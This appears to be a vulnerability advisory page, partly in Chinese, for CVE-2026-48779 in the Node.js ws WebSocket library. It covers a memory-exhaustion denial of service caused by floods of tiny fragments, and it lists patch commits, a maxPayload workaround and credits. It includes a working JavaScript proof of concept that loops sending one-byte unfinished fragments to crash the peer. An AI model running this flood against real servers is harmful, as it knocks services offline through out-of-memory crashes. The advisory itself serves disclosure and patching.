CVE-2026-48779

描述

### Impact A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. ### Proof of concept ```js import { WebSocket, WebSocketServer } from 'ws'; const wss = new WebSocketServer({ port: 0 }, function () { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket(`ws://localhost:${port}`); ws.on('open', function () { (function send() { ws.send(data, options, function (err) { if (err) return; send(); }); })(); }); ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(`client close - code: ${code} reason: ${reason.toString()}`); }); }); wss.on('connection', function (ws) { ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(`server close - code: ${code} reason: ${reason.toString()}`); }); }); ``` ### Patches The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to [email protected] (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), [email protected] (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and [email protected] (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53). ### Workarounds In vulnerable versions, the issue can be mitigated by lowering the value of the `maxPayload` option if possible. ### Credits The vulnerability was responsibly disclosed and fixed by [Nadav Magier](https://github.com/Nadav0077).

如何修補 CVE-2026-48779

要修補 CVE-2026-48779,請將受影響套件升級到下列已修補版本。

• —升級至 5.2.5 或更新版本

CVE-2026-48779 正在被利用嗎?

目前沒有被利用訊號。CVE-2026-48779 既不在 CISA KEV 也沒有最新的 EPSS 分數。

受影響套件(1)